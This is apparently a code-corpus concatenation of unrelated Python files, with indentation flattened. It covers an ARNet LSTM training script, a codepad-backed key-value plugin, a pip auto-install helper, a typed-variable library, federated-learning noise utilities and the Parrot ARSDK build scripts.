self.lstm_size = opt.lstm_size
self.lstm = tf.contrib.rnn.BasicLSTMCell(self.lstm_size, state_is_tuple=True)
self.logit_W = tf.Variable(tf.random_uniform([self.lstm_size, 10], -0.08, 0.08), name='logit_W')
self.logit_b = tf.Variable(tf.zeros([10]), name='logit_b')
# ARNet
self.rcst_weight = opt.rcst_weight
self.lstm_rcst = tf.contrib.rnn.BasicLSTMCell(self.lstm_size, state_is_tuple=True)
self.linear_rcst_W = tf.Variable(tf.random_uniform([self.lstm_size, self.lstm_size], -0.08, 0.08), name='linear_rcst_W')
self.linear_rcst_b = tf.Variable(tf.zeros([self.lstm_size]), name='linear_rcst_b')
def build_model(self):
pixels = tf.placeholder(tf.float32, [self.batch_size, self.lstm_step, 1])
onehot_labels = tf.placeholder(tf.int32, [self.batch_size, 10])
state = self.lstm.zero_state(batch_size=self.batch_size, dtype=tf.float32)
state_rcst = self.lstm.zero_state(batch_size=self.batch_size, dtype=tf.float32)
prev_h = state[1]
rcst_loss = 0.0
for i in range(0, self.lstm_step):
with tf.variable_scope("LSTM"):
if i > 0:
tf.get_variable_scope().reuse_variables()
output, state = self.lstm(pixels[:, i], state)
if i == self.lstm_step - 1:
logit_outputs = tf.matmul(output, self.logit_W) + self.logit_b
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=onehot_labels, logits=logit_outputs)
loss = tf.reduce_sum(cross_entropy) / self.batch_size
with tf.variable_scope("rcst"):
if i > 0:
tf.get_variable_scope().reuse_variables()
output_rcst, state_rcst = self.lstm_rcst(output, state_rcst)
output_rcst_proj = tf.matmul(output_rcst, self.linear_rcst_W) + self.linear_rcst_b
current_rcst_loss = tf.reduce_sum(tf.square((output_rcst_proj - prev_h))) * self.rcst_weight
current_rcst_loss /= self.batch_size
rcst_loss += current_rcst_loss
return loss, rcst_loss, logit_outputs, pixels, onehot_labels
def train(opt, x_train, y_train, x_test, y_test):
tf.set_random_seed(opt.seed)
model = LSTM(opt)
tf_loss, tf_rcst_loss, tf_logit_outputs, tf_pixels, tf_onehot_labels = model.build_model()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.InteractiveSession(config=config)
# restore from the pre-trained model
saver = tf.train.Saver(max_to_keep=opt.max_epochs, write_version=1)
saver.restore(sess, opt.rcst_model_base_path)
tf_learning_rate = tf.placeholder(tf.float32)
with tf.variable_scope(tf.get_variable_scope(), reuse=False):
train_op = tf.train.AdamOptimizer(tf_learning_rate).minimize(tf_loss)
uninitialized_vars = []
for var in tf.global_variables():
try:
sess.run(var)
except tf.errors.FailedPreconditionError:
uninitialized_vars.append(var)
if len(uninitialized_vars):
init_new_vars_op = tf.variables_initializer(uninitialized_vars)
sess.run(init_new_vars_op)
iter_cnt = 0
for epoch in range(0, opt.max_epochs):
if epoch == 0:
current_learning_rate = opt.learning_rate
elif epoch != 0 and epoch % opt.learning_rate_decay_every == 0:
current_learning_rate = current_learning_rate * opt.learning_rate_decay_rate
# training
for start, end in zip(range(0, x_train.shape[0], opt.batch_size),
range(opt.batch_size, x_train.shape[0], opt.batch_size)):
start_time = time.time()
current_batch_pixels_train = x_train[start:end]
current_batch_labels_train = y_train[start:end]
feed_dict = {tf_learning_rate: current_learning_rate,
tf_pixels: current_batch_pixels_train,
tf_onehot_labels: current_batch_labels_train}
_, loss_val, rcst_loss_val, logit_outputs = sess.run([train_op, tf_loss, tf_rcst_loss, tf_logit_outputs], feed_dict)
# 计算训练精度
pred_y = np.argmax(logit_outputs, axis=1)
true_y = np.argmax(current_batch_labels_train, axis=1)
current_acc = sum(pred_y == true_y) / float(opt.batch_size)
iter_cnt += 1
end_time = time.time()
print("iter {:4d} epoch {:3d} lr {:.5f} loss {:.4f} rcst_loss {:.4f} train_acc {:.4f} time batch {:.4f}".format(iter_cnt,
epoch, current_learning_rate, loss_val, rcst_loss_val, current_acc, end_time-start_time))
# validation
if np.mod(epoch, 1) == 0:
print("epoch {} is done, saving the model ...".format(epoch))
saver.save(sess, os.path.join(opt.rcst_model_save_path, 'model_epoch'), global_step=epoch)
true_cnt = 0
test_batch_cnt = 0
for start, end in zip(range(0, x_test.shape[0], opt.batch_size),
range(opt.batch_size, x_test.shape[0], opt.batch_size)):
current_batch_pixels_test = x_test[start:end]
current_batch_labels_test = y_test[start:end]
feed_dict = {tf_learning_rate: current_learning_rate,
tf_pixels: current_batch_pixels_test,
tf_onehot_labels: current_batch_labels_test}
loss_test, logit_outputs = sess.run([tf_loss, tf_logit_outputs], feed_dict)
# 计算验证精度
pred_y = np.argmax(logit_outputs, axis=1)
true_y = np.argmax(current_batch_labels_test, axis=1)
true_cnt += sum(pred_y == true_y)
test_batch_cnt += 1
test_acc = true_cnt / float(test_batch_cnt * opt.batch_size)
print("epoch {} test_acc {:.4f} test_num: {}".format(epoch, test_acc, test_batch_cnt * opt.batch_size))
if __name__ == '__main__':
opt = opts.parse_opt()
opt_dict = vars(opt)
for k, v in opt_dict.items():
print(k + ': \t' + str(v))
with open('permuted_mnist_110.pkl', 'rb') as f:
permuted_mnist = cPickle.load(f)
if os.path.isdir(opt.rcst_model_save_path) is False:
os.mkdir(opt.rcst_model_save_path)
x_train_permuted = permuted_mnist['x_train_permuted']
y_train = permuted_mnist['y_train']
x_test_permuted = permuted_mnist['x_test_permuted']
y_test = permuted_mnist['y_test']
# training
train(opt, x_train_permuted, y_train, x_test_permuted, y_test)
``` |
{
"source": "201528015329004/pyhacker",
"score": 3
} |
#### File: my_plugins/kvdb/openkvCore.py
```python
import base64
import urllib2
import datetime
class OpenKVCore:
def postComment(self, session, content, comment_url):
comment_data = {'parent': "", 'text': content, 'submit': "Post Comment"}
r = session.post(comment_url, data=comment_data)
if r.ok:
s = r.url
if s.find("comment") == -1:
raise ("failed to upload")
return False
else:
return True
raise ("server error")
return False
def getHtml(self, session, webbase_id):
info_url = 'http://codepad.org/' + webbase_id
r = session.get(info_url)
if r.ok:
return r.text
raise ("server error")
def filteredContent(self, record, username, password, key):
items = record.split('#SEP#')
time, user, pwd, key, value = tuple(items)
if user == username.strip() and pwd == password.strip():
return key, base64.b64decode(value), time
return None
def login(self, root, pwd, session):
login_url = 'http://codepad.org/login'
login_data = {'username': root, 'password': <PASSWORD>, 'submit': 'Login'}
r = session.post(login_url, data=login_data)
if r.ok:
ret = r.text
if ret.find("logout") == -1:
raise ("failed to init")
return False
return True
else:
print ("server error")
return False
def fastVerify(self, record, username, password, key=None):
if key is None:
s = '#SEP#' + username + '#SEP#' + password + '#SEP#'
else:
s = '#SEP#' + username + '#SEP#' + password + '#SEP#' + key + '#SEP#'
return record.find(s) >= 0
def getOnlineUTCTime(self):
webpage = urllib2.urlopen("http://just-the-time.appspot.com/")
internettime = webpage.read()
OnlineUTCTime = datetime.datetime.strptime(internettime.strip(), '%Y-%m-%d %H:%M:%S')
return OnlineUTCTime
```
#### File: pyhacker/utils/package_manage.py
```python
def install_and_import(package):
import importlib
try:
importlib.import_module(package)
except ImportError:
import pip
pip.main(['install', package])
finally:
globals()[package] = importlib.import_module(package)
``` |
{
"source": "201528015329004/TyPy",
"score": 2
} |
#### File: TyPy/typy/typy.py
```python
class TypeBase(object):
__static_types__ = {}
def __init__(self):
original_members = ['__static_types__', '__class__', '__delattr__', '__dict__', '__doc__', '__format__', '__getattribute__', '__hash__', '__init__', '__module__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__used_keys__', '__weakref__','submit', 'get_members']
user_defined_members = set(dir(self)) - set(original_members)
functions,variables= [],[]
for name in user_defined_members:
if callable(getattr(self,name)):
functions.append(name)
else:
variables.append(name)
#print 'func',functions
#print 'var',variables
def __setattr__(self,attr,value):
t_value = TypeVar(type(value),value)
if hasattr (self,attr):
# need to check the type
# value is of TypeVar
prestored = getattr(self,attr)
if type(prestored) == TypeVar:
# if the attr is an attr defined by self.attr
if type(value) == TypeVar:
if prestored.t_raw == value.t_raw:
super(TypeBase,self).__setattr__(attr,t_value)
return
else:
print "value.t == prestored.t:",value.t_raw,prestored.t_raw,prestored.t_raw == value.t_raw
raise TypeError("{} should be of type {}, but got {}".format(str(attr), prestored.t, value.t))
# value is not of TypeVar
elif type(value) == prestored.t_raw:
super(TypeBase,self).__setattr__(attr,t_value)
return
else:
raise TypeError("{} should be of type {}, but got {}".format(str(attr), prestored.t, type(value)))
else:
if attr in dir(self):
# this attr is a class attr, I will just keep it as it is
TypeBase.__static_types__[attr] = type(prestored)
if type(value) == TypeVar:
if value.t_raw == TypeBase.__static_types__[attr]:
super(TypeBase,self).__setattr__(attr,value)
return
else:
raise TypeError("{} should be of type {}, but got {}".format(str(attr), TypeBase.__static_types__[attr], value.t_raw))
elif type(value) == TypeBase.__static_types__[attr]:
super(TypeBase,self).__setattr__(attr,value)
return
else:
raise TypeError("{} should be of type {}, but got {}".format(str(attr), TypeBase.__static_types__[attr], type(value)))
else:
raise TypeError("{} is not defined in instances of {}".format(str(attr), self.__class__))
else:
super(TypeBase,self).__setattr__(attr,t_value)
class TypeVar(object):
def __init__(self,objType,value=None):
if type(objType) != type and type(objType) != TypeDef:
raise TypeError("the 1st parameter should be of 'type' type")
if value is not None:
if type(value) != objType:
raise TypeError("expected the type of 'value' to be {}, got {}".format(objType,type(value)))
self.__objType__ = objType if type(objType) == TypeDef else TypeDef(objType)
self.__objValue__ = value
def __getattr__(self,name):
if hasattr(super(TypeVar,self),name):
return getattr(super(TypeVar,self),name)
elif hasattr(self.__objValue__,name):
return getattr(self.__objValue__,name)
def __dir__(self):
dir_list = dir(super(TypeVar,self))
dir_list.extend(dir(self.__objValue__))
return dir_list
@staticmethod
def var(value):
return TypeVar.__create__(type(value),value)
@staticmethod
def __create__(objType,value=None):
instance = TypeVar(objType,value)
return instance
def _consistent_type(self,obj):
if type(obj) != TypeDef:
return self.t_raw == type(obj)
return self.t_raw == obj.t_raw
def _is_value_and_type_consistent(self):
if type(self.__objType__) == type:
return self.__objType__ == type(self.__objValue__)
if type(self.__objType__) == TypeDef:
return self.__objType__.t_raw == type(self.__objValue__)
def _is_computable(self,raw_type):
number_types = [int,float,long,complex]
if self.t_raw in number_types and raw_type in number_types:
return True
else:
return False
def __get_type_and_value(self,other):
if type(other) == TypeDef:
raw_type = other.t_raw
raw_value = other.v
else:
raw_type = type(other)
raw_value = other
return raw_type,raw_value
def assign(self,value):
if value == None:
self.v = None
return
if type(value) == TypeVar:
if self.t == value.t:
self.__objValue__ = value.v
return
else:
raise TypeError("Assignment failed. expecting {}, got {}".format(self.t,value.t))
if self.t_raw == type(value):
self.__objValue__ = value
else:
raise TypeError("Assignment failed. expecting {}, got {}".format(self.t_raw,type(value)))
def __operation_value__(self,value):
if type(value) != TypeVar:
ret = TypeVar.__create__(type(value),value)
return ret
else:
return value
def __add__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v + raw_value.v
else:
value = self.v + raw_value
return self.__operation_value__(value)
def __sub__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v - raw_value.v
else:
value = self.v - raw_value
return self.__operation_value__(value)
def __mul__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v * raw_value.v
else:
value = self.v * raw_value
return self.__operation_value__(value)
def __pow__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
print "raw_type,raw_value",raw_type,raw_value
if hasattr(raw_value,'v'):
value = self.v ** raw_value.v
else:
value = self.v ** raw_value
return self.__operation_value__(value)
def __truediv__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v / raw_value.v
else:
value = self.v / raw_value
return self.__operation_value__(value)
def __floordiv__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v // raw_value.v
else:
value = self.v // raw_value
return self.__operation_value__(value)
def __mod__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v % raw_value.v
else:
value = self.v % raw_value
return self.__operation_value__(value)
def __lshift__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v << raw_value.v
else:
value = self.v << raw_value
return self.__operation_value__(value)
def __rshift__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v >> raw_value.v
else:
value = self.v >> raw_value
return self.__operation_value__(value)
def __and__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v & raw_value.v
else:
value = self.v & raw_value
return self.__operation_value__(value)
def __or__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v | raw_value.v
else:
value = self.v | raw_value
return self.__operation_value__(value)
def __eq__(self, other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v == raw_value.v
else:
value = self.v == raw_value
return self.__operation_value__(value)
def __ne__(self, other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v != raw_value.v
else:
value = self.v != raw_value
return self.__operation_value__(value)
def __xor__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v ^ raw_value.v
else:
value = self.v ^ raw_value
return self.__operation_value__(value)
def __lt__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v < raw_value.v
else:
value = self.v < raw_value
return self.__operation_value__(value)
def __gt__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v > raw_value.v
else:
value = self.v > raw_value
return self.__operation_value__(value)
def __ge__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v >= raw_value.v
else:
value = self.v >= raw_value
return self.__operation_value__(value)
def __le__(self,other):
raw_type,raw_value = self.__get_type_and_value(other)
if hasattr(raw_value,'v'):
value = self.v <= raw_value.v
else:
value = self.v <= raw_value
return self.__operation_value__(value)
def __invert__(self):
value = ~self.v
return self.__operation_value__(value)
def __str__(self):
return str(self.__objValue__)
def __repr__(self):
return self.__str__()
@property
def v(self):
return self.__objValue__
@property
def t(self):
return self.__objType__
@property
def t_raw(self):
return self.__objType__.t
def __type__(self):
return str(self.t)
class TypeDef(object):
def __init__(self,objType):
if type(objType) == type:
self.__objType__ = objType
else:
raise TypeError("the 1st parameter should be of 'type' type")
def __str__(self):
return str(self.__objType__)
def __repr__(self):
return "Type wrapper for " + repr(self.__objType__)
@property
def t(self):
return self.__objType__
``` |
{
"source": "20155104009/GMSNet",
"score": 2
} |
#### File: GMSNet/model/template.py
```python
import math
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
class Network(nn.Module):
def __init__(self):
super(Network, self).__init__()
def forward(self, x):
return x
``` |
{
"source": "2016312357/FL-shield",
"score": 2
} |
#### File: 2016312357/FL-shield/1.py
```python
import random
import numpy as np
a=np.mean([1,3,5,6,7,8])
print(a)
import scipy.sparse as sp
import collections
def load_client_train_date(): # for FL train
filename = "./Data/train_data"
num_users = 0
num_items = 0
with open(filename, "r") as f:
line = f.readline()
while line is not None and line != "":
arr = line.split("\t")
u, i = int(arr[0]), int(arr[1])
num_users = max(num_users, u)
num_items = max(num_items, i)
line = f.readline()
num_items += 1
num_users += 1
print(num_users,num_items)
mat = sp.dok_matrix((num_users, num_items), dtype=np.float32)
with open(filename, "r") as f:
line = f.readline()
while line is not None and line != "":
arr = line.split("\t")
user, item, rating = int(arr[0]), int(arr[1]), float(arr[2])
# print("usr:{} item:{} score:{}".format(user,item,rating))
if rating > 0:
mat[user, item] = 1.0
line = f.readline()
#client_datas = [[[], [], []] for i in range(num_users)] # 三元组 !!!!!!!!!!!!!!
with open('./Data/test_negative','a+') as w, open('./Data/test_data','r') as r:
line = r.readline()
while line is not None and line != "":
arr = line.split("\t")
user, item = int(arr[0]), int(arr[1])
w.write('('+str(user)+','+str(item)+')')
line = r.readline()
for t in range(99): # 任意选择一个没有看的电影,作为negative项
nega_item = np.random.randint(num_items)
while nega_item==item or (user, nega_item) in mat.keys():
nega_item = np.random.randint(num_items)
w.write('\t'+str(nega_item))
w.write('\n')
print('done')
#load_client_train_date()
```
#### File: 2016312357/FL-shield/Noise_add.py
```python
import numpy as np
import copy
# import torch
import random
# from Calculate import get_1_norm#, get_2_norm, inner_product, avg_grads
def noise_add(noise_scale, w):
w_noise = copy.deepcopy(w)
if isinstance(w[0], np.ndarray) == True:
noise = np.random.normal(0, noise_scale, w.size())
w_noise = w_noise + noise
else:
for k in range(len(w)):
for i in w[k].keys():
noise = np.random.normal(0, noise_scale, w[k][i].size())
'''if args.gpu != -1:
noise = torch.from_numpy(noise).float().cuda()
else:
noise = torch.from_numpy(noise).float()'''
w_noise[k][i] = w_noise[k][i] + noise
return w_noise
def users_sampling(args, w, chosenUsers):
if args.num_chosenUsers < args.num_users:
w_locals = []
for i in range(len(chosenUsers)):
w_locals.append(w[chosenUsers[i]])
else:
w_locals = copy.deepcopy(w)
return w_locals
'''def clipping(args, w):
if get_1_norm(w) > args.clipthr:
w_local = copy.deepcopy(w)
for i in w.keys():
w_local[i]=copy.deepcopy(w[i]*args.clipthr/get_1_norm(w))
else:
w_local = copy.deepcopy(w)
return w_local'''
``` |
{
"source": "2016-Capstone/PythonController",
"score": 2
} |
#### File: arsdk-xml/ARSDKBuildUtils/SDK3Build.py
```python
import os
import sys
import subprocess
import shutil
try:
import argcomplete
hasArgComplete = True
except ImportError:
hasArgComplete = False
MYDIR=os.path.abspath(os.path.dirname(sys.argv[0]))
if '' == MYDIR:
MYDIR=os.getcwd()
sys.path.append('%(MYDIR)s/Utils/Python' % locals())
#Custom imports
from xml.dom.minidom import parseString
from ARFuncs import *
from time import localtime, strftime
from Common_GitUtils import *
import commandLine
import xmlreader
import time
#This is a message to announce the new build system
ARPrint ('\n\nThis script is deprecated and doesn\'t work anymore.\n')
ARPrint ('Please download repo (http://source.android.com/source/downloading.html#installing-repo).')
ARPrint ('Then run \'repo init -u https://github.com/Parrot-Developers/arsdk_manifests.git\' in an empty folder.')
ARPrint ('Then run \'repo sync\' to get all sources.')
ARPrint ('After that, you\'ll be able to run \'./build.sh\' to build the SDK.')
ARPrint ('\n\nYou can find a full documentation here: http://developer.parrot.com/docs/bebop/#go-deeper\n\n')
exit(0)
# After that comment, this is the old build. Left here in memory of the old time we spent building the SDK with it. RIP
start = time.time()
DEBUG_MODE = False
#
# Init the log file
#
ARInitLogFile()
#
# Get extra xml dirs
#
xmlDirs = [ MYDIR ]
try:
extraXmlDirs = os.environ['ARSDK_EXTRA_XML_DIRS'].split(':')
xmlDirs.extend(extraXmlDirs)
xmlDirs.remove('')
except:
pass
#
# Parse XML
#
(repos, targets, prebuilts, libraries, binaries) = xmlreader.parseAll(xmlDirs)
if DEBUG_MODE:
ARPrint ('Debug mode enabled : dump XML contents')
repos.dump()
targets.dump()
prebuilts.dump()
libraries.dump()
binaries.dump()
EXIT(0)
#
# Parse command line args
#
parser = commandLine.CommandLineParser(targets, libraries, binaries)
if hasArgComplete:
argcomplete.autocomplete(parser.parser)
parser.parse(sys.argv)
#
# Dump command line args into log file
#
parser.dump()
#
# Export useful tools if available
# (e.g. colormake)
#
ARMakeArgs = '-j ' + str(parser.threads)
ARSetEnvIfExists('ARMAKE', 'colormake', 'make', args=ARMakeArgs)
# Import targets functions for library/binary/doc
# This block will try to import the functions for all targets declared in targets.xml file
# Adding a new target requires the following modifications :
# 1> Add the target in targets.xml filr
# 2> Adapt libraries.xml / binaries.xml to support this target
# 3> Create the Target_BuildLibrary.py script in Utils/Python dir
# -> This file must contain a Target_BuildLibrary(target, lib, clean=False, debug=False) function
# 4> (Optionnal) Create the Target_BuildBinary.py script in Utils/Python dir
# -> This file must contain a Target_BuildBinary(target, bin, clean=False, debug=False) function
# 5> (Optionnal) Create the Target_GenLibraryDoc.py script in Utils/Python dir
# -> This file must contain a Target_GenLibraryDoc(target, lib, clean=False) function
BUILD_LIB_FUNCS = {}
BUILD_BIN_FUNCS = {}
GEN_DOC_FUNCS = {}
for t in targets.list:
try:
_name = t.name + '_BuildLibrary'
_module = __import__ (_name)
BUILD_LIB_FUNCS[t.name] = getattr (_module, _name)
except ImportError:
pass
try:
_name = t.name + '_BuildBinary'
_module = __import__ (_name)
BUILD_BIN_FUNCS[t.name] = getattr (_module, _name)
except ImportError:
pass
try:
_name = t.name + '_GenLibraryDoc'
_module = __import__ (_name)
GEN_DOC_FUNCS[t.name] = getattr (_module, _name)
except ImportError:
pass
#
# Do force clean if needed
#
if parser.isForceClean:
ARLog("Force clean !")
TARGETDIR = '%(MYDIR)s/Targets' % locals()
ARDeleteIfExists (TARGETDIR)
# Do all-cleanup if needed
if parser.isForceCleanup:
allRepoDirs=[]
for repo in repos.list:
if not repo.ext:
allRepoDirs.append(repo.getDir())
cleanScript = '%(MYDIR)s/Utils/cleanupSDKRepo.bash' % locals()
ARExecute(cleanScript + ' ' + ARListAsBashArg(allRepoDirs))
exit(0)
#
# Do all repo work:
# - Clone non existant repositories
# - Checkout the requested branch/tag/commit
# - If on a branch, pull it
#
if not parser.noGit:
checkAllReposUpToDate(repos, MYDIR, parser.repoBaseUrl, parser.defaultBaseRepoUrl, extraScripts=parser.extraGitScripts)
else:
ARLog('Skipping git checks')
if parser.doNothing:
ARLog('Nothing to be done')
exit(0)
# Android case --> Force minimum api level and target api level
ARSetEnv('AR_ANDROID_MIN_VERSION', '14')
ARSetEnv('AR_ANDROID_API_VERSION', '19')
#
# Actual build loop
#
allOk = True
for target in parser.activeTargets:
libraries.clearCache()
binaries.clearCache()
if parser.activeLibs:
if target.name in BUILD_LIB_FUNCS:
for lib in parser.activeLibs:
if not BUILD_LIB_FUNCS[target.name](target, lib, clean=parser.isClean, debug=parser.isDebug, nodeps=parser.noDeps, inhouse=parser.isInHouse, requestedArchs=parser.archs, isMp=parser.multiProcess):
allOk = False
else:
ARLog('Unable to build libraries for target %(target)s' % locals())
if parser.genDoc and not parser.isClean:
if target.name in GEN_DOC_FUNCS:
for lib in parser.activeLibs:
GEN_DOC_FUNCS[target.name](target, lib)
TargetDocIndexScript = ARPathFromHere('Utils/generateDocIndex.bash')
TargetDocIndexPath = ARPathFromHere('Targets/%(target)s/Build/Doc' % locals())
ARExecute('%(TargetDocIndexScript)s %(TargetDocIndexPath)s %(target)s' % locals())
else:
ARLog('Unable to generate documentation for target %(target)s' % locals())
if parser.activeBins:
if target.name in BUILD_BIN_FUNCS:
for bin in parser.activeBins:
if not BUILD_BIN_FUNCS[target.name](target, bin, clean=parser.isClean, debug=parser.isDebug, nodeps=parser.noDeps, inhouse=parser.isInHouse, requestedArchs=parser.archs):
target.failed = True
allOk = False
else:
ARLog('Unable to build binaries for target %(target)s' % locals())
for scrinfo in target.postbuildScripts:
scr = scrinfo['path']
if allOk:
if not ARExecute(scr + ' >/dev/null 2>&1', failOnError=False):
ARPrint('Error while running ' + scr + '. Run manually to see the output')
target.failed = True
scrinfo['done'] = False
allOk=False
else:
scrinfo['done'] = True
if not allOk:
break
if parser.installDoc and allOk:
DocCopyScript = ARPathFromHere('Utils/copyDoc.bash')
for target in parser.activeTargets:
ARExecute ('%(DocCopyScript)s %(target)s' % locals())
hasColors = ARExecute('tput colors >/dev/null 2>&1', failOnError=False, printErrorMessage=False)
if ARExistsInPath('stty'):
termSizeStr = ARExecuteGetStdout(['stty', 'size'], failOnError=False, printErrorMessage=False)
termSizeArr = termSizeStr.split(' ')
try:
termCols = int(termSizeArr[1]) - 1
except:
termCols = 80
else:
termCols = 80
class logcolors:
FAIL = '\033[31m' if hasColors else 'FA:'
PASS = '\033[32m' if hasColors else 'OK:'
REQ = '\033[33m' if hasColors else 'ND:'
NONE = '\033[34m' if hasColors else 'NR:'
UNAI = '\033[30m' if hasColors else 'NA:'
DEF = '\033[39m' if hasColors else ''
def SDKPrintStatus(msg, available, requested, tried, built, padToLen=20, newline=False, currentCol=0, baseCol=0):
colorLen = 3 if not hasColors else 0
padLen = padToLen - len(msg)
while padLen <= 0:
padLen += padToLen
printLen = len(msg) + padLen + colorLen
futureCol = currentCol + printLen
if futureCol > termCols:
newline = True
if newline:
ARPrint('')
ARPrint(' '*baseCol, True)
futureCol = printLen + baseCol
if not available:
ARPrint(logcolors.UNAI, True)
elif not requested and not tried:
ARPrint(logcolors.NONE, True)
elif not tried:
ARPrint(logcolors.REQ, True)
elif not built:
ARPrint(logcolors.FAIL, True)
else:
ARPrint(logcolors.PASS, True)
ARPrint(msg, True)
if padLen > 0:
ARPrint(' '*padLen, True)
ARPrint(logcolors.DEF, True)
return futureCol
ARPrint('')
ARPrint('Status :')
ARPrint(' --> Legend : ' + logcolors.FAIL + 'FAIL ' + logcolors.PASS + 'PASS ' + logcolors.REQ + 'NOT_BUILT ' + logcolors.NONE + 'NOT_REQUESTED ' + logcolors.UNAI + 'NOT_AVAILABLE ' + logcolors.DEF)
ARPrint(' --> Binaries are postfixed with `*`')
ARPrint(' --> Postbuild scripts are postfixed with `+`')
ARPrint('')
offset = 13 if hasColors else 16
for t in targets.list:
targetRequested = t in parser.activeTargets
targetTried = bool(t.triedToBuildLibraries)
targetBuilt = len(t.alreadyBuiltLibraries) == len(t.triedToBuildLibraries) and not t.failed
SDKPrintStatus(t.name, True, targetRequested, targetTried, targetBuilt, padToLen=10)
ARPrint(' : ', True)
count=offset
first=False
for l in libraries.list:
libAvailable = l.isAvailableForTarget(t)
libRequested = l in parser.activeLibs and targetRequested
libTried = t.hasTriedToBuild(l)
libBuilt = t.hasAlreadyBuilt(l)
count = SDKPrintStatus(l.name, libAvailable, libRequested, libTried, libBuilt, padToLen=20, newline=first, currentCol=count, baseCol=offset)
first=False
first=True
for b in binaries.list:
binAvailable = b.isAvailableForTarget(t)
binRequested = b in parser.activeBins and targetRequested
binTried = t.hasTriedToBuildBinary(b)
binBuilt = t.hasAlreadyBuiltBinary(b)
count = SDKPrintStatus(b.name + '*', binAvailable, binRequested, binTried, binBuilt, padToLen=20, newline=first, currentCol=count, baseCol=offset)
first=False
first=True
for scrinfo in t.postbuildScripts:
scrAvailable = True
scrRequescted = targetRequested
scrTried = scrinfo['done'] is not None
scrBuilt = bool(scrinfo['done'])
count = SDKPrintStatus(scrinfo['name'] + '+', scrAvailable, scrRequescted, scrTried, scrBuilt, padToLen=20, newline=first, currentCol=count, baseCol=offset)
first=False
ARPrint('')
ARPrint('')
ARLog('End of build')
if not allOk:
ARLog('-- Errors were found during build ! --')
end = time.time()
seconds = int(end - start)
hours, tmp = divmod(seconds, 3600)
minutes, seconds = divmod(tmp, 60)
strh=''
strm=''
strs = str(seconds) + 's'
if hours > 0:
strh = str(hours) + 'h '
strm = str(minutes) + 'm '
if minutes > 0:
strm = str(minutes) + 'm '
ARLog('Build took %(strh)s%(strm)s%(strs)s' % locals())
sys.exit (0 if allOk else 1)
```
#### File: Utils/Python/ARFuncs.py
```python
import sys
import subprocess
import os
import inspect
import shutil
import re
import filecmp
import errno
# Print a message
def ARPrint(msg, noNewLine=False):
sys.stdout.write(msg)
if not noNewLine:
sys.stdout.write('\n')
# Exit the script with an optional error code
def EXIT(code):
if code != 0:
ARPrint('-- ABORTING --')
sys.exit(code)
# Class to handle 'cd' and 'cd -'
class Chdir:
def __init__(self, newPath, create=True, verbose=True):
self.savedPath = os.getcwd()
if not os.path.exists(newPath) and create:
os.makedirs(newPath)
os.chdir(newPath)
self.verbose = verbose
if verbose:
try:
ARLog('Entering <%(newPath)s>' % locals())
except:
pass
def exit(self):
os.chdir(self.savedPath)
if self.verbose:
try:
ARLog('Returning to <'+self.savedPath+'>')
except:
pass
# Execute a bash command
def ARExecute(cmdline, isShell=True, failOnError=False, printErrorMessage=True):
try:
if printErrorMessage:
ARLog('Running <%(cmdline)s>' % locals())
subprocess.check_call(cmdline, shell=isShell)
return True
except subprocess.CalledProcessError as e:
if printErrorMessage:
ARPrint('Error while running <%(cmdline)s>' % locals())
if failOnError:
EXIT(e.returncode)
else:
return False
# Execute a bash command, and return the stdout output
def ARExecuteGetStdout(args, isShell=False, failOnError=True, printErrorMessage=True):
if printErrorMessage:
ARLog('Running <' + ARListAsBashArg(args) + '>')
p = subprocess.Popen(args, shell=isShell, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)
out, err = p.communicate()
ret = p.wait()
if ret:
if printErrorMessage:
ARLog('Error while running <' + ARListAsBashArg(args) + '>')
if failOnError:
EXIT(ret)
return ''
return out.strip()
# Checks if a given commands exists in path
def ARExistsInPath(program, isShell=True):
try:
subprocess.check_call('which %(program)s 2>/dev/null 1>/dev/null' % locals(), shell=isShell)
return True
except subprocess.CalledProcessError as e:
return False
# Set an environment variable
def ARSetEnv(var, val):
os.environ[var] = val
# Set an environment variable if not currenly defined
# return True if the variable was added
def ARSetEnvIfEmpty(var, val):
if os.environ.get(var) is None:
os.environ[var] = val
return True
return False
# Unset an environment variable
def ARUnsetEnv(var):
if var in os.environ:
os.environ.pop(var)
# Set an environment variable to 'ideal' if it exists in path, else to 'fallback'
def ARSetEnvIfExists(var, ideal, fallback, args=''):
if ARExistsInPath(ideal):
ARSetEnv(var, ideal + ' ' + args)
else:
ARSetEnv(var, fallback + ' ' + args)
# Append a message to a file
def ARAppendToFile(filename, message, doPrint=True):
arfile = open(filename, 'a')
arfile.write(message + '\n')
arfile.close()
if doPrint:
ARPrint(message)
# Log a message(append to the default logfile + output to console)
def ARLog(message):
LOGFILE = os.environ.get('ARLOGF')
if not LOGFILE:
LOGFILE = ARPathFromHere('build.log')
